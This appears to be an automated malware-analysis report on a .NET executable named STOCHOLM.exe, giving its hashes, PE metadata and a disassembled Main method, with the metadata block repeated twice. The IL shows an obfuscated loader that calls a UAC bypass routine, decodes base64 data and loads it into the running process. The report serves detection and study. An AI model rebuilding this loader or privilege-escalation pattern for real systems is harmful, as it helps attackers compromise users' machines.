Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 2b74db9ac4b779aa0c90e105f6012511
|
| Sha1 | 6487a11310f83a9131583c13267a12fffb756d39
|
| Sha256 | a33b3cb7c2f7f4f13c4b0503d403ac9584655ef92a07d2c88ed38cc1b15f3b51
|
| Sha384 | 9d9e83b59f79f235d6bb75a8b428f76c02f2bf1922fa649f6d2510cdc280dbf0a84a0bc35edc933e5ef9c78dbbf01d18
|
| Sha512 | 76a580759d7b4f8cd66bb0290fb0a47fd243914cea5fed4327efb95c3dead869af32671b3355eeb31961655b4cd270268137e131ee6008849813e02f05d8f72d
|
| SSDeep | 12288:H75Gf8DzxhMU75Gf8DzxhMU2iND75Gf8DzxhMVySvgXOwI8J:H0f8DV90f8DVr1d0f8DVsCU8
|
| TLSH | BE15890066B383D5C96D01FA85A6D6EC4E718DE27369C339D98AFE492D3225E130D3B7
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: C:\Users\Administrator\documents\visual studio 2010\Projects\STOCHOLM\STOCHOLM\obj\x86\Release\STOCHOLM.pdb |
| Module Name | STOCHOLM.exe |
| Full Name | STOCHOLM.exe |
| EntryPoint | System.Void WindowsFormsApplication1.Program::Main() |
| Scope Name | STOCHOLM.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | STOCHOLM |
| Assembly Version | 18.5.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 55 |
| Main Method | System.Void WindowsFormsApplication1.Program::Main() |
| Main IL Instruction Count | 104 |
| Main IL | br IL_000D: nop br IL_0013: ldc.i4 1 conv.ovf.i1.un <null> conv.i1 <null> div <null> nop <null> br IL_0005: br IL_0013 ldc.i4 1 ldc.i4 2047593740 ldc.i4 1305845588 ldc.i4 632579234 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldloca V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc V_6 ldloc V_0 brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute() leave IL_01B8: ret call System.Void WindowsFormsApplication1.UACBypass::Execute() call System.Void WindowsFormsApplication1.CoreManager::InitializeShield() call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity() ldc.i4 60000 call System.Void WindowsFormsApplication1.Program::S(System.UInt32) ldc.i4 1244124813 ldc.i4 1305766580 ldc.i4 632656356 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) stloc V_1 ldloc V_1 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse IL_008B: ldloc V_1 leave IL_01B8: ret ldloc V_1 ldc.i4 2114407108 ldc.i4 1305766582 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1432588284 ldc.i4 1305766582 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 1366866314 ldc.i4 1305766576 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1685068557 ldc.i4 1305766576 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 818148685 ldc.i4 1305766578 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 214370645 ldc.i4 1305766578 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) call System.Byte[] System.Convert::FromBase64String(System.String) stloc V_2 ldc.i4 1132450136 ldc.i4 1305766594 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_3 ldc.i4 309885496 ldc.i4 1305766626 ldc.i4 632579236 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_4 ldc.i4 1780730267 ldc.i4 1305766642 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_5 call System.AppDomain System.AppDomain::get_CurrentDomain() ldloc V_3 ldc.i4 1 ldloc V_2 ldloc V_4 ldloc V_5 call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String) leave IL_01A0: leave IL_01B8 pop <null> leave IL_01A0: leave IL_01B8 leave IL_01B8: ret ldloc V_6 brfalse IL_01B7: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> br IL_01BE: nop nop <null> br IL_01C6: br IL_0013 not <null> add.ovf <null> br IL_0013: ldc.i4 1 ret <null> |
| Module Name | STOCHOLM.exe |
| Full Name | STOCHOLM.exe |
| EntryPoint | System.Void WindowsFormsApplication1.Program::Main() |
| Scope Name | STOCHOLM.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | STOCHOLM |
| Assembly Version | 18.5.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 55 |
| Main Method | System.Void WindowsFormsApplication1.Program::Main() |
| Main IL Instruction Count | 104 |
| Main IL | br IL_000D: nop br IL_0013: ldc.i4 1 conv.ovf.i1.un <null> conv.i1 <null> div <null> nop <null> br IL_0005: br IL_0013 ldc.i4 1 ldc.i4 2047593740 ldc.i4 1305845588 ldc.i4 632579234 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldloca V_0 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc V_6 ldloc V_0 brtrue IL_0047: call System.Void WindowsFormsApplication1.UACBypass::Execute() leave IL_01B8: ret call System.Void WindowsFormsApplication1.UACBypass::Execute() call System.Void WindowsFormsApplication1.CoreManager::InitializeShield() call System.Void WindowsFormsApplication1.CoreManager::CheckLongevity() ldc.i4 60000 call System.Void WindowsFormsApplication1.Program::S(System.UInt32) ldc.i4 1244124813 ldc.i4 1305766580 ldc.i4 632656356 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) stloc V_1 ldloc V_1 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse IL_008B: ldloc V_1 leave IL_01B8: ret ldloc V_1 ldc.i4 2114407108 ldc.i4 1305766582 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1432588284 ldc.i4 1305766582 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 1366866314 ldc.i4 1305766576 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 1685068557 ldc.i4 1305766576 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) ldc.i4 818148685 ldc.i4 1305766578 ldc.i4 632579206 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) ldc.i4 214370645 ldc.i4 1305766578 ldc.i4 632579204 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) callvirt System.String System.String::Replace(System.String,System.String) call System.Byte[] System.Convert::FromBase64String(System.String) stloc V_2 ldc.i4 1132450136 ldc.i4 1305766594 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_3 ldc.i4 309885496 ldc.i4 1305766626 ldc.i4 632579236 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_4 ldc.i4 1780730267 ldc.i4 1305766642 ldc.i4 632579220 call System.String WindowsFormsApplication1.A21ee9f8de72e496480247c3af7202d6c::Aa89ceda0d32e4f17947472bff96a58c9(System.Int32,System.Int32,System.Int32) call System.String WindowsFormsApplication1.Program::D(System.String) stloc V_5 call System.AppDomain System.AppDomain::get_CurrentDomain() ldloc V_3 ldc.i4 1 ldloc V_2 ldloc V_4 ldloc V_5 call System.Void WindowsFormsApplication1.Program::cell(System.AppDomain,System.String,Microsoft.VisualBasic.CallType,System.Byte[],System.String,System.String) leave IL_01A0: leave IL_01B8 pop <null> leave IL_01A0: leave IL_01B8 leave IL_01B8: ret ldloc V_6 brfalse IL_01B7: endfinally ldloc V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null> br IL_01BE: nop nop <null> br IL_01C6: br IL_0013 not <null> add.ovf <null> br IL_0013: ldc.i4 1 ret <null> |